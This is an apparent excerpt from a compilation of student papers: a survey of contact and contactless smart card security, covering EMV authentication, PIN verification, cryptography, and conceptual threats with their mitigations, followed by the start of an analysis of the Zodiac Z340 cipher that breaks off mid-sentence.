Steffen, G. Breyta, C. S. Yannoni, M. H. Sherwood, and I. L. Chuang. Experimental realization of Shor’s quantum factoring algorithm using nuclear magnetic resonance. Nature, 414(quant-ph/0112176):883–887, 2001. 108 Smart Card Security: A Study into the Underlying Techniques Deployed in Smart Cards Clement Tan, Qi Lin Ho, Soo Ming Poh Abstract. This paper explores the techniques used with smart cards, broadly categorized into contact smart cards and contactless smart cards. For each technique, the underlying methods are outlined with their strengths and weaknesses evaluated. Potential threats of smart cards are also discussed together with the solution provided to counter these security issues threatening smart cards. The paper concludes by investigating the possible future of smart cards and the upcoming technology of Near Field Communication. 1 Introduction Smart card has been one of the most remarkable inventions within the Information Technology (IT) sphere. Smart card was first invented in 1968 and was commercially practiced in France in 1983 as telephone card for payment for the use of public pay phones [1]. After the successful mass use of the cards, memory concept was incorporated into the cards. More researches were then performed and this lead to the development of microprocessor smart cards. Smart cards can be categorized into two general forms: (1) Memory and Microprocessor; (2) Contact and Contactless. In the former category, memory smart cards only store data. Microprocessor smart cards not only store data but also allow the addition, deletion and modification of data stored within the memory. In the latter category, physical interaction with card readers/terminals will be required for contact smart cards to work. On the other hand, contactless smart cards eliminate the need of physical contact with terminal due to an embedded antenna within the card which allows communication to take place. Due to the many benefits smart cards have brought to people; this includes convenience and ease of use, popularity with smart cards has been increasing tremendously. At present, smart cards are used in application areas such as: (1) financial, e.g. credit cards, debit cards; (2) mass transit, e.g. EZ-Link cards; (3) identification, e.g. biometric cards; (3) healthcare, e.g. health insurance cards; (4) telecommunications, e.g. SIM (Subscriber Identification Module) cards. This paper will be focusing mainly on the Contact and Contactless smart cards. The rest of the paper is organized as follows; the next section gives an introduction of Contact and Contactless smart cards, their underlying security techniques and potential threats associated. Section 3 covers the comparison of each security techniques. Section 4 discusses about the future of smart cards and finally paper will conclude at Section 5. 109 2 Contact Smart Cards Contact smart cards are cards embedded with an integrated circuit chip (ICC) that contain either just purely memory or a combination with a microprocessor. As its name suggests, contact smart cards have to be inserted into a smart card reader in order to establish a direct connection for the transfer of data [2]. Contact smart cards are identified with a small yet obvious gold connector plate measuring approximately one square centimetres located at a corner of the card. Some examples of contact smart cards include Cash Cards, Credit Cards, Debit Cards and even SIM (Subscriber Identification Module) cards utilized in mobile phones. 2.1 Security Techniques Implemented in Contact Smart Cards EMV (Europay, MasterCard and VISA) technology sets the specifications established in support for the replacement of the metallic strip for chip technology on contact smart cards. With the introduction of EMV specifications, global interoperability can be assured between contact smart cards and its card readers [3]. More importantly, EMV also enhances the security level in three main areas of concern in a contact smart card transaction: card authentication, cardholder verification and transaction authorization [4]. Card Authentication. To prove the genuineness of contact smart cards and enhance protection against from counterfeits, three techniques are made available. These include Static Data Authentication (SDA), Dynamic Data Authentication (DDA) and Combined DDA with Application Cryptogram Generation (CDA). During a payment transaction, the card chip and the terminal agree to perform either SDA, DDA or CDA. Only one method of offline data authentication is performed for a particular transaction. Static Data Authentication. SDA makes use of a symmetric key encryption technique whereby both the card and bank have a same shared secret key. This key is required to verify the Cryptographic Check Value (CCV) stored in the card during personalization [5]. It must be noted that the verification of card will only be reached when the bank assures it. The issue relating to SDA is that the card can only be proven to be genuine if terminal is online. In the case of an offline terminal, the card cannot be validated straight away. What offline terminal does is only recording the response provided by card during authorization and sending it to the bank when there is connection. With this shortcoming, it gives SDA chip cards a disadvantage since they are perceived to be even less secure than magnetic strip cards if an offline terminal is used (i.e. one that will never have any connections). Dynamic Data Authentication. DDA is a technique more secured than SDA. Instead of utilizing a single shared secret key, DDA stores an encryption key which allows for offline data authentication in which the card uses public key technology to generate a cryptographic value, which includes transaction-specific data elements, that is validated by the terminal to protect against skimming [6], a feature SDA is unable to 110 provide. In addition, the card generates a new cryptographic value each time a new transaction is performed. Therefore, DDA is perceived to be a stronger form of card authentication since the attackers will not be able to acquire the private key on the chip card just by reading the card [7]. Combined DDA with Application Cryptogram Generation. CDA provides the underlying techniques of a combination of both SDA and DDA. In the case of utilizing CDA, not only the genuineness of cards can be validated, a special performance of determining whether data within the cards have been altered since personalization. In this way, the malicious act of programming offline terminals through use of counterfeit cards can be avoided [8]. Essentially, all three techniques for card authentication employ RSA (Rivest, Shamir, and Adleman) public key cryptography. Card Verification. To prove the genuineness of owners and protect against lost and/or stolen cards, four types of card verification methods (CVM) are used. Online PIN, Offline PIN, Signature and No CVM required. Online PIN. For this technique of card verification, users enter their PIN which will be encrypted with Triple DES Data Encryption Standard (3DES) and then transported to the issuer, the bank, for verification purposes [9]. Offline PIN. In the case of offline PIN, the PIN entered by users is compared with the pre-assigned PIN value in the card. In addition, there exists an offline counter which allows the offline PIN to be blocked when a certain incorrect attempts of PIN have been entered [10]. Signature. Cardholder owners will be required to physically provide a signature in order to ensure the genuineness of being the owner. An advantage of using signature as a form of verification is that there is certain level of difficulty in forging signatures; however this does not mean there are no cases of signature forging. On the other hand, this verification method will require a human to be around to check the signature with the one on the card to determine its genuineness [11]. No CVM Required. This verification method can be said to be the most dangerous form since if no CVM is required, there will actually be no need for a verification process. The only advantage of this money is the fluency of transactions [12]. Transaction Authorization. To prove that a transaction is genuinely initiated by the users, transaction will be needed to be authorized by these users. The process, Online Mutual Authentication (OMA), will include using Authorization Request Cryptogam (ARQC) and Authorization Response Cryptogram (ARPC). Contact smart cards will produce an ARQC to the terminal, i.e. card reader, then to the issuer (bank) when a transaction is initiated. Only when the verification is successful will the issuer return 111 an ARQC to the card. The card will then return a Transaction Certificate to proceed with the transaction. 3 Contactless Smart Cards The contactless smart cards employ a radio frequency between the Proximity IC Card (PICC) and the Proximity Coupling Device (PCD) without physical insertion of the card into the reader. As seen in Fig. 1, this is made possible as the PICC contains an integrated chip and an inductive antenna coil embedded within the card. An alternating current passes through the PCD antenna and creates an electromagnetic field, which induces a current in the PICC antenna. The PICC then converts this electromagnetic field into a DC voltage to power the PICC‟s internal circuits. The maximum proximal distance possible for transmission would be determined by the configuration and tuning of both antennas in PICC and PCD. Fig. 1. PCD and PICC Configuration These contactless smart cards are used in situations where quick transactions are necessary, whenever the cardholder is in motion at the moment of the transaction. Many contactless readers are designed specifically for cashless payment, physical control, identification systems and transportation applications [13]. 3.1 Security Techniques Implemented Triple Data Encryption Standard. Triple DES takes three 64-bit keys, for an overall key length of 192 bits. The Triple DES DLL then breaks the user provided key into three subkeys, padding the keys if necessary so they are each 64 bits long. The data is encrypted with the first key, decrypted with the second key, and finally encrypted again with the third key. Triple DES runs three times slower than standard DES, but is 112 much more secure if used properly. The procedure for decrypting something is the same as the procedure for encryption, except it is executed in reverse. Like DES, data is encrypted and decrypted in 64-bit chunks [14]. Advanced Encryption Standard. AES is a symmetric block cipher that encrypts and decrypts 128-bit blocks of data. The algorithm consists of 4 stages that make up a round which is iterated 10 times for a 128-bit length key. The first stage “SubBytes” transformation is a non-linear byte substitution for each byte of the block. The second stage “ShiftRows” transformation cyclically shifts (permutes) the bytes within the block. The third stage “MixColumns” transformation groups 4-bytes together forming 4-term polynomials and multiplies the polynomials with a fixed polynomial mod (x4+1). The fourth stage “AddRoundKey” transformation adds the round key with the block of data [15]. RSA Signature. RSA is a public key cryptosystem for both encryption and authentication. It is an encryption algorithm that uses very large prime numbers to generate the public key and the private key. RSA is typically used in conjunction with a secret key cryptosystem such as DES. DES would be used to encrypt the message as a whole and then use RSA to encrypt the secret key [16]. Elliptic Curve Cryptography (ECC). ECC is a public key cryptography. “Domain parameters” in ECC is a predefined constants to be known by all the devices taking part in the communication between the sender and the receiver. ECC does not require any shared secret between the communicating parties but it is much slower than the private key cryptography. The mathematical operations of ECC are defined over the elliptic curve y2=x3+ax+b, where 4a3+27b2≠0. Each value of the „a‟ and „b‟ gives a different elliptic curve. The public key is a point in the curve and the private key is a random number. The public key is obtained by multiplying the private key with the generator point G in the curve. The generator point G, the curve parameters „a‟ and „b‟, together with few more constants constitutes the domain parameter of ECC [17]. 4 4.1 Comparison across Smart Card Security Techniques Evaluation of Security Techniques in Contact Smart Cards In this section, an analysis on the security techniques employed in Contact Smart Cards will be done. This analysis includes the strengths (i.e. benefits) and weakness (i.e. potential threats) for each underlying techniques. In addition to this analysis, suggested solutions or mitigations will be provided. Card Authentication. Static Data Authentication. The main reason why SDA is used in the Card Authentication process is mainly due to its low implementation costs. It is generally 113 much cheaper to deploy SDA rather than DDA. The reason behind this low cost is because SDA does not require public key cryptographic processing. Without this process, there will not be a need to use cards that comes with a public key cryptographic processor. Therefore the lower cost [18]. As the saying „You get what you pay for‟, with a cheaper technique, there is bound to be weaknesses. As mentioned earlier, SDA requires a terminal that is online in order to validate the genuineness of the card. An attacker can launch an attack by simply making use of an offline terminal. For example, an attacker skims/clones a genuine card to produce a counterfeit card to use on an offline terminal. What he needs to do is just to program the card in such a way that it will agree to whatever PIN he enters [19]. And there he goes, the transaction or rather, the attack will be successful. Skimming and Cloning. Information on a card can be recorded when a user uses his card on a machine which has skimmer devices attached. PIN entered by users will be captured using a capturing device. After all these have been done, the unauthorized user will make a duplication of the card by cloning all information. Since unauthorized user now has a cloned card and PIN, he will be able to make himself authorized for any transactions. In order to lower the risk of skimming and cloning leading to production of use of counterfeit cards, additional properties such as data locking and tamper resistance can be included. For the former suggestion, data within the card can be locked so that attacker will not be able to retrieve the data found in the card. For the latter suggestion, data within card can be encrypted so that even if attacker found ways of retrieving data within the card, they will not be able to decipher the data. In this way, it will be much more secured. Dynamic Data Authentication. As one of the means to mitigate the threat faced by SDA, Dynamic Data Authentication is being used. As mentioned in the previous section, the combination of an encryption key together with the public key technology makes DDA a more secured authentication method since card data can be authenticated and validated. DDA also include additional security features such as secure key storage and tamper resistance which prevent counterfeiting of cards [20]. However, with this additional security features, cards which are integrated with public key cryptographic processor will be required. Therefore, this explains the high costs for the use of dynamic data authentication as compared to static data authentication technique. In addition, DDA is not foolproof; there is also possibility for „wedge‟ attack to take place. Since card authentication takes place before PIN verification, a stolen card can be exploited without knowing the correct PIN [21]. As shown in Fig. 1 below, an electronic device as a "man-in-the-middle" or “wedge” can manipulate the messages flowing between the terminal and card which will interfere with the card verification process. 114 Fig. 2. Variation of a Man-in-the-Middle Attack/“Wedge” Attack on a Contact Smart Card [22] A suggested solution will be to allow both card authentication and card verification processes to take place simultaneously. By doing so, the risk of “Wedge” attack can be moderated. It will be seen later that another form of authentication method (Combined DDA with Application Cryptogram Generation) technique is able to perform such function. Combined DDA with Application Cryptogram Generation. Facing with the threat of „Wedge‟ attack in DDA technique, a later variant of card authentication technique CDA is introduced. CDA is able to partially solve the issued faced by DDA since CDA allows card authentication and PIN verification both at the same time. However, due to the lack of interoperability (i.e. it may not work with terminal of older versions). CDA does not receive as much popularity as compared to DDA [23]. CDA is actually considered to be a very secured authentication method, therefore, interoperability issues should be dealt with in order to receive higher feedbacks. Card Verification. Online PIN Verification. Online PIN method has high level of security given the fact that it is encrypted with Triple DES Data Encryption Standard when transported to the issuer for verification. With issuer‟s verification, it can be certain that card verification can be achieved with minimum threat. Offline PIN verification. This method of card verification provides higher level of security given the fact that it contains an offline counter which will block the use of offline PIN when a certain incorrect attempts of PIN have been entered. As illustrated 115 in Fig. 2, chip will decrease PIN Try Counter by one when an incorrect PIN is entered. When it reaches zero, the card will be blocked and user will need to go down to the issuer to re-activate the card. This protection can also be a double-edge sword. What if a genuine cardholder forgets his PIN. The blockage of the use of card will now be seen to be an annoyance since he will need to re-activate his card in order to use it. Fig. 3. Offline Pin Verification Process [24] Signature. This method of card verification provides ease of use to users. Apart from eliminating the need to remember PINs (assuming each card is given a different PIN), signature is very personal. This means that only the genuine owner will know the exact way of signing the signature. However, forging of signature is not 100% impossible. Since signature can be found on the back of the card, anyone who has picked up a signed card can learn to forge the signature. On top of that, it is often seen that merchants do not always check the signature signed with the one on the card. This will place signature card verification method at a higher risk in terms of security. Indeed PIN and Signature verification methods do have their own advantages; however they do possess certain inevitable threats. The former is prone to „PIN stealing‟. This means that PIN entered onto a terminal can be observed by „shoulder surfing‟. As for the latter, it has been mentioned that it is prone to forging cases. As a result, PIN and Signature verification methods can be seen to be as insecure. Reported in an article, 63% of consumers will prefer fingerprint as a form of card verification 116 over PIN and Signature [25]. In the future, it may be possible that fingerprint verification will take over the other verficiation method. This is highly doable since fingerprint is a one form of biometric capable of identifying individual. In addition, no two persons can have identical fingerprints. Hence, in this way, it can reach an even higher level of security eliminating the threats of „PIN stealing‟ and forging. EMV Technology as a Whole. The above provides specific analysis of individual security techniques. As we can see, EMV Technology is considered to be highly secured. However EMV is still not foolproof. A prominent example of potentials threat faced by contact smart cards is the Middleperson Attack (Relay Attack). Middleperson Attack (Relay Attack) [26]. Given you are at a restaurant having lunch. At the end of the meal, you pay $50 for with your VISA card. However, at the end of the month, you found out you have paid for $500 instead of the $50 for the meal. What has actually happened? Fig. 4. Man-in-the-Middle Attack on a Contact Smart Card [27] The above example is one form of middleperson attack or relay attack. The Point of Sale (POS) terminal that used to make the payment has been tampered with. Just when you were about to enter your PIN onto the POS terminal, the waiter at the restaurant had informed his accomplice to get ready for the „attack‟. He first inserts a fake card into a POS terminal at another store. As soon as you enter your PIN, the PIN will be transmitted wirelessly to the card and accomplice who then enters the PIN he has received and successful attack had just been launched. The attackers have just used your account to pay for their items at another store. 4.2 Evaluation of Security Techniques in Contactless Smart Cards In this section, an analysis on the security techniques employed in Contactless Smart Cards will be done. This analysis includes the strengths (i.e. benefits) and weakness 117 (i.e. potential threats) specific to the contactless smart card technology. In addition to this analysis, suggested solutions or mitigations will be provided. Potential Threats of Contactless Smart Cards [28]. The main difference between contact and contactless smart cards lies in the process where information is transmitted between the card and the reader. In the case of the contactless smart card, the card does not need to be inserted and be in direct contact with the reader. This creates opportunities for potential threats due to the contactless transmission of data, thereby creating threats specific to contactless smart cards. Eavesdropping. The absence of a medium between contactless smart card and the reader provides convenience and easy access to intercept and change data that is being transmitted over the air. This allows for eavesdropping that is a common threat which exploits the largest weakness of contactless transmission of information. Hackers are able to eavesdrop and alter the data which was being transferred. In the passive setting, hacker may learn useful or confidential information by triggering a response from the card at a distance, with the user unaware of it. On the other hand, in the active setting, man-in-the-middle attacks are facilitated. A hacker can replace a few blocks of data which were initially transferred to the blocks of data he wants. For these reasons, it is important to stress that encryption of the data being exchanged and mutual authentication are compulsory in most cases. Interruption of Operations. The other threat contactless smart card face is that of interruption of operations. Due to the weakness of contactless smart card moving in the electromagnetic field, the data transmission between the reader and the card may be interrupted at any moment without the user's notice. This results in the user moving his smart card out of the electromagnetic field without even realizing it. Therefore, the system needs to ensure that transactions are completed successfully without any miscommunication of data. Thus, reliable backup mechanisms need to be implemented and back-dated data should be available whenever possible. Denial of Service. This common type of attack within the computer network may also occur in contactless smart cards. This attack can be done via the owner of the card, or by the hackers within close proximity. The former would be carried out when users, for some reason, want to redeem a new functional card from the issuer free-of-charge. The latter would be performed when monetary units could be debited from the card at close proximity, thus denying the user access to the service he had purchased for. The information within the contactless smart cards can be deleted or destroyed complete using inappropriate electromagnetic waves. Covert Transactions. The most important difference between contact and contactless smart cards lies in the fact that the user does not notice whether a fake reader is entering into a communication with the card he is holding. Therefore the biggest threat for contactless technology is represented by covert transactions in which fraudulent merchants communicate with the user‟s card, triggering fake transactions using fake readers. Such merchants could potentially process a number of transaction with a smaller amount, or even from a distance debit all monetary units contained on 118 the card. A sound approach to protect against this attack strategy is strong mutual authentication between the card, the reader and the user, possibly relying on certificates, and requiring some kind of user interaction. For example, a user could be prompted to push a button on his card or to apply some similar mechanism whenever a transaction is performed. In any case, the system must assist the user to only accept legitimate transactions. Other types of attacks. Physical attacks on the chip hardware, for example, by microelectronic probing as well as so called side-channel attacks, in which the opponent simply monitors the electrical activity of the chip and tries to turn seemingly unrelated power, time or electromagnetic emanation measurements into meaningful information. These kinds of attacks are new types of side-channel attacks against contactless technology have recently emerged. These have proven quite successful in recovering secret information from the card, given very limited resources, if no specific countermeasures are implemented. Security in 3DES. The use of the 3DES algorithm to calculate Cryptographic Check Values (CCV). The primary purpose of the CCV is to provide a data integrity function that ensures that the message has not been manipulated in any way. This includes the alteration, addition and deletion of data. The essential security of smart cards data transmission can be achieved by the use of sequence numbers which are incorporated within the CCV. The CCV also supplies some assurance of source authentication depending on the key management architecture. However, the CCV does not provide the property of non-repudiation. It is almost impossible to prove whether the message to a third party is authentic as the receiver has the same secret key as the sender and has the ability to create a new message or to modify an existing message [29]. Security in RSA. It is relatively easy to generate an apparently authentic copy of a digital signature since no evidence is present to prove the authenticity of the digital signature. Source authenticity or non-repudiation cannot be checked as the authenticity of the keys cannot be proven. Therefore there is a need to create additional steps to be assured of the authenticity of the senders‟ public key [30]. 5 5.1 Related Work: Future of Smart Cards More extensive use of smart cards in various industries and practices Smart cards have now integrated of our daily lives as we rely heavily on the technology to pay for our transport fares, enter our offices, access our computers at work and even to get a snack from the vending machine. Consumer research has revealed that nearly 80 percent of consumers surveyed believe that smart cards will be an important part of their everyday life and more than three-quarters are largely attracted to smart cards which will be able to consolidate payment functions and store personal data on the same card. Smart cards also have the potential to become lifestyle cards, holding a range of applications chosen by the cardholder [31]. 119 Most of the smart card systems in use today each serve only a single purpose and are related to just one process or hardwired to only one application. A smart card cannot simply justify its existence in this respect and the approach of the future smart card is therefore towards designing multi-application cards with an operating system based on an open standard that can perform a variety of functions [32]. At the Personal Level. At the personal level in the near future, we foresee smart cards to be configurable and able to handle multiple tasks selected by their owners. From providing access into company networks, enabling electronic commerce, storing personal health records, providing ticketless airline travel and car rentals, to offering electronic identification for accessing government services just to name a few [33]. The ultimate goal of which would be to carry fewer cards but gain greater convenience and faster access to a wide array of information. At the Corporate Level. At the corporate level there too exists a growing trend in the adoption of smart card and card reader systems by companies and corporations across various industries. For instance, hospitals utilize smart card technology to ensure more timely and secure dispensing of medicine to patients. A medicine cabinet would be fitted with a reader technology and then wirelessly connected to software that links up personal dosage information stored on an RFID wristband. Hence if a patient is required to take one tablet at six o‟clock in the morning, the software will communicate with the cabinet to indicate that the patient needs to access their medicine. The patient then presents his wristband to the cabinet reader, allowing access to their prescribed medication at the correct time [34]. Smart card technology is also getting attention from the fleet management sector, where RFID is already being installed in rental cars. The idea is that a rental car could be parked on the street corner and is accessed simply by presenting an RFID-enabled card to a reader installed within the window screen. HID Global, a trusted leader in providing access control and secure identity solutions, including secure card issuance and RFID technology, is working with some major car rental companies interested in leveraging the benefits of this technology to streamline the management of their fleets [35]. 5.2 Possibility of Replacement by NFC-Enabled Smart Phone Devices With a wide and growing number of industries finding utility for smart cards in their operations, coupled with the increasing popularity and adoption of smart phones, there lies a huge possibility of integrating over and smart card functionalities into smart phones. This would serve to fulfill the requirements of a multi-function smart card while reducing the need for another physical card containing a microprocessor chip. At least in the local context, such a scenario may soon become reality when consumers here are allowed to tap and pay for their purchases at more than 20,000 120 retail points and taxis from the middle of 2012 with Near Field Communication (NFC) technology on a smart phone. NFC is a short-range wireless communication technology capable of bidirectional data transfer which allows mobile phones and NFC readers to communicate and conclude transactions within a 4-cm distance, operating in the HF frequency band at 13.56 MHz [36]. When launched in 2012, the deployment focus of NFC technology will be on retail payment but it will be extended to uses for loyalty schemes, ticketing and gift vouchers within two years. Discussions will be held with the Land Transport Authority to plan for the rollout of NFC mobile payment for transit in early 2013 [37]. Merchants need not install new devices to accept mobile payment from NFC phones, those that currently accept contactless payment cards from MasterCard, Visa or CEPAS will be able to use the same device to accept such payment [38]. Such has already been utilized in certain parts of Europe and Asia, such as South Korea and Japan. 6 Conclusion The use of smart cards has provided convenience and ease of use to different individuals and entities. But as discussed in this paper, there are several security concerns and potential threats which users and developers have to be aware of. Developers have to be aware of and guard smart card systems against attacks and potential threats from hackers. These security measures include cryptographic algorithms, digital signature and key management which will possibly allow for authentication, maintain data integrity, provides confidentiality and non-repudiation. In the case of the contact smart card technology, the card authentication, verification process and transaction authorization are of utmost importance as these areas are where hackers are likely to attack. Measures such as Static Data Authentication, Dynamic Data Authentication and Combined DDA with Application Cryptogram Generation have been used to check for card authentication. On the other hand, password-related mechanisms like PIN number and signature are required for card verification. Lastly for the transaction authorization, authorization request and response cryptograms are implemented to ensure that transactions are genuine and successful. Due to a lack of medium in contactless smart card technology, the security in the process of information transmission is critical for protecting the user. This creates opportunities for potential threats such as eavesdropping, denial of service and covert transactions. Developers have the responsibility to prevent these attacks from happening with various forms of security mechanisms as described previously. With the pervasive use of smart cards in various aspects of our lives, smart cards have become a necessity which provides us with extensive convenience. We foresee smart cards to be configurable and able to handle multiple tasks selected by the users. Many different industries and companies have brought the use of smart cards to brand new levels which include incorporating it with medicine dispensers and rental cars 121 access. Lastly, there also lies a new possibility of integrating smart card functionalities into smart phones using Near Field Communication. The motivation being that a single smart phone is able to replicate the capabilities of numerous smart cards. This upcoming technology could therefore possibly pose a huge threat to smart cards and bring with it future studies into other security principles, techniques and issues to do with NFC. References 1. Smart card: Invented here, http://www.nytimes.com/2005/08/09/world/europe/09ihtcard.html 2. Durability of Smart Cards for Government eID, http://www.datacard.com/downloads/ViewDownLoad.dyn?elementId=repositories/downloa ds/xml/govt_wp_smartcard_durability.xml&repositoryName=downloads&index=8 3. Smart Card Alliance. EMV: Frequently Asked Questions, http://www.smartcardalliance.org/pages/publications-emv-faq#q15 4. Smart Card Alliance. EMV: Facts at a Glance, http://www.smartcardalliance.org/resources/pdf/EMV_Facts_081111.pdf 5. Chip and Pin, http://www.smartcard.co.uk/Chip%20and%20PIN%20Security.pdf 6. VISA. Chip Terms Explained. A Guide to Smart Card Terminology, http://www.visaasia.com/ap/center/merchants/productstech/includes/uploads/CTENov02.pdf 7. Cotignac. Blog. EMV Offline Data Authentication, http://cotignac.co.nz/blogs/11December2008.html 8. e-EMV: Emulating EMV for Internet payments using Trusted Computing technology, http://digirep.rhul.ac.uk/file/03ef906a-ba3d-6978-8202-864e1a5f9942/1/RHUL-MA-200610.pdf 9. VISA. General PED Frequently Asked Questions, http://www.secureretailpayments.com/resources/visa-ped-faq.pdf 10. VISA. General PED Frequently Asked Questions, http://www.secureretailpayments.com/resources/visa-ped-faq.pdf 11. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/CardholderVerification-Methods 12. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/CardholderVerification-Methods 13. EMV Contactless Communication Protocol-News-Cards Tech & Security, http://www.ects.net/en/article.asp?/41.html 14. Strong Encryption Package, Triple DES Encryption, http://www.tropsoft.com/strongenc/des3.htm 15. Advanced Encryption Standard (AES), http://www.vocal.com/cryptography/aes.html 16. KEY-BASED ENCRYPTION: Rivest Shamir Adleman (RSA), http://library.thinkquest.org/27158/concept2_4.html 17. Elliptic Curve Cryptography. An Implementation Tutorial, http://www.reverseengineering.info/Cryptography/AN1.5.07.pdf 18. How thieves bypass bank card Pins, http://www.thisismoney.co.uk/money/saving/article1614798/How-thieves-bypass-bank-card-Pins.html 19. Chip and Spin, http://www.chipandspin.co.uk/spin.pdf 20. 3-D Secure: A critical review of 3-D Secure and its effectiveness in preventing card not present fraud, http://www.58bits.com/thesis/3-D_Secure.html#_Toc290908599 122 21. Defending against wedge attacks in Chip & PIN, http://www.lightbluetouchpaper.org/2009/08/25/defending-against-wedge-attacks/ 22. EMV PIN verification “wedge” vulnerability, http://www.cl.cam.ac.uk/research/security/banking/nopin/ 23. Defending against wedge attacks in Chip & PIN, http://www.lightbluetouchpaper.org/2009/08/25/defending-against-wedge-attacks/ 24. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/CardholderVerification-Methods 25. 63% of Consumers Prefer Credit Card Verification by Fingerprint over PIN, Signature or Photo, http://www.banktech.com/architecture-infrastructure/227900120 26. Chip and Spin! Examining the technology behind the “Chip and PIN” initiative, http://www.chipandspin.co.uk/problems.html 27. Chip & PIN (EMV) Relay Attacks, http://www.cl.cam.ac.uk/research/security/banking/relay/ 28. Contactless Technology Security Issues, http://www.chipublishing.com/samples/ISB0903HH.pdf 29. Cryptography and Key Management, http://www.smartcard.co.uk/tutorials/sct-itsc.pdf 30. Cryptography and Key Management, http://www.smartcard.co.uk/tutorials/sct-itsc.pdf 31. My Money Skills. Is there a Smart Card in Your Future? http://www.mymoneyskills.pk/english/cd/uc/future.jsp 32. Smart Card Technology: Past, Present, and Future, http://www.journal.au.edu/ijcim/2004/jan04/jicimvol12n1_article2.pdf 33. Smart Card Technology: Past, Present, and Future, http://www.journal.au.edu/ijcim/2004/jan04/jicimvol12n1_article2.pdf 34. The Future of Smart Card Technology is Here Today or Is It? http://www.hidglobal.com/main/blog/2010/04/the-future-of-smart-card-technology-is-heretoday-or-is-it.html 35. The Future of Smart Card Technology is Here Today or Is It? http://www.hidglobal.com/main/blog/2010/04/the-future-of-smart-card-technology-is-heretoday-or-is-it.html 36. Performing Relay Attacks on ISO 14443 Contactless Smart Cards using NFC Mobile Equipment, http://www.sec.in.tum.de/assets/studentwork/finished/Weiss2010.pdf 37. Buy Thing with Mobile Phones? This May be Reality from Mid-2010, http://www.todayonline.com/Singapore/EDC111026-0000201/Buy-things-with-mobilephones?-This-may-be-reality-from-mid-2012 38. TODAYonline | Singapore | Consortium to bring NFC shopping to Singapore by 2012, http://www.todayonline.com/Singapore/EDC111025-0000502/Consortium-to-bring-NFCshopping-to-Singapore-by-2012 123 124 Analysis of Zodiac-340 Cipher Yuanyi Zhou, Beibei Tian, Qidan Cai National University of Singapore, Information System Computing 1 13 Computing Drive Singapore 117417 Abstract. With the ubiquity of personal computers and software, complex arithmetic calculations become possible for different areas such as crime solving, military analysis, and medical researchers. The reason is that computer can run through a large number of possible combinations much faster than human brains do. However, many encryption methods are designed in ways that require an obscene amount of time to be encrypted. Even with the help of computers, there are still some problems remaining unsolved due to their complexity, one of them is, The Zodiac Z340 [1]. Keywords: The main purpose of our project is to decrypt the Zodiac-340 cipher. 1 Introduction The serial killer, Zodiac, who terrorized Northern California in the late 1960s, sent four ciphers to local press. These ciphers were claimed as the trace of his criminal facts but only one of the four ciphers has been successfully decoded, keeping the identity of the killer unknown. Nevertheless, a sketch (figure 1) of the Zodiac killer was drawn based on witness testimonies [2]. Although the killer may have passed away already, the process of solving his ciphers is still undergoing. Figure 1. 125 2 Background The objective of our research is to reduce the number of methods that could have been used to encrypt the message. The first cipher that has been decoded is called Z480. Among the remaining three, Z340 is the commonly tried one while the other two have hardly attempted because of the brevity of the cipher messages. One is the Z13, which is believed to reveal the name of the killer, the other is the Z32 sent because the killer was upset that no one followed his wishes to wear the buttons. 2.1 Finding from Z480 Z480 was encrypted as a homophonic substitution cipher. The plaintext is: “I like killing people because it is so much fun It is more fun than killing wild game in the forrest because man is the most dangerous anamal of all To kill somethinggives me the most thrilling experence It is even better than getting your rocks off with a girl The best part of it is that when I die I will be reborn in paradice and all the I have killed will become my slaves I will not give you my name because you will try to slow down or stop my collecting of slaves for my afterlife.” Figure 2. Z408 part 1, sent to Vallejo Times-Herald on July 31, 1969, decoded on August 8, 1969 126 Figure 3. Z408 part 2, sent to San Francisco Chronicle on July 31, 1969, decoded on August 8, 1969 Figure 3. Z408 part 3, sent to San Francisco Examiner on July 31, 1969, decoded on August 8, 1969 2.2 Z340 A lot of conventions have been tried including: one-time pad, double transposition columnar, polyalphabetic substitution, and homophonic substitution. However, none of them have produced the result. There are also some creative ideas proposed such as Mr. Farmer’s Japanese play “帝(Mikado)” thoughts, but none of them have been verified [3]. 127 Figure 4. Z340, sent to the San Francisco Chronicle on November 8, 1969 2.3 Z13 Z13 was considered to be the killer’s attempt to disclose his name. Figure 5. Z13, sent to San Francisco Chronicle on April 20, 1970 2.4 Z32 The last cipher was sent after the killer found that no one was following his instruction to wear the special pursue a further muder. buttons, which made him upset and decided to 128 Figure 6. Z32, sent to San Francisco Chronicle on June 26, 1970 3. Prior possible decryption methods 3.1 The Z340 seems to be a completely meaningless message We firstly thought that Z340 is actually a completely meaningless message. But after analyzing the whole case, we found that Zodiac seemed to be very proud of his killing and being not caught by the police. He also continued to encrypt his identification into the letters to challenge the whole world. Thus we drew the conclusion that this Z340 is genuine and contains some important information about this killer’s identification. 3.2 Web-based Dump analysis Code-breakers have attempted to solve the Z340 for the past forty years with no success. During these forty years, code-breakers have investigated the Z340 from multiple perspectives: (1) It is a homophonic cipher similar to the Z408; (2) It is a polyalphabetic cipher, which used an improvement from the Z408 encryption method; (3) as a double transposition columnar, another improvement from the Z408 encryption method; and (4) as a one-time pad, the unbreakable encryption method when used properly. All of these methods have failed to deliver any meaningful conclusion during the 40 years. So our group conclude that due to the similarity of Z408 and Z340, Zodiac maybe used the same way as Z408 to encrypt Z340, which is homophonic substitution method. But because of the failing attempt for such long time, so maybe he used an improvement method from the Z408 encryption method. 4. Analyzing the 340-cipher – what we did Thus our group has been come up with and attempted the following ways to interpret340 cipher: (1) use the partial break method and find the Identification number of the zodiac killer in this cipher; (2) the Holy Bible method; (3) analyzing the special features of 340-cipher. (4) The 340-cipher was written using the Zodiac signature that was segmented into 12 equal 30-degree slices. 129 4.1 Partial break method As the Zodiac killer claimed, the cipher contains his identity. Thus we guess that the cipher should contain an Identification Number of the Zodiac killer. That is the reason why we come up with the first method. We do some research on the format of the identification number of Americans in 1960s. We found that the identification number, known as Social Security Number (SSN), contains nine digits [4]. Before we continue, we should introduce a website first. When we search the information of zodiac ciphers, we found a quite useful website, which is “http://oranchak.com/zodiac/webtoy/”. We will refer it as “zodiac tool” in this report. By using this zodiac tool, we can replace any of the 62 zodiac symbols with a chosen English character. What we did is just replacing any symbols with frequency lower than 2% (not including A) with “A” and we tried to find a string contains at least nine “A”s appear consecutively. Those with higher frequency have lower possibility to be numbers, which is the reason we tried lower frequency symbols. Thereafter, we got the longest string with five “A”s consecutively as it shows in the figure 7. This means that the Z340 probably not contains SSN and this method doesn’t work to break the Z340. Figure 7, the result we get using the zodiac tool 130 4.2 Holy Bible method We noticed there is a 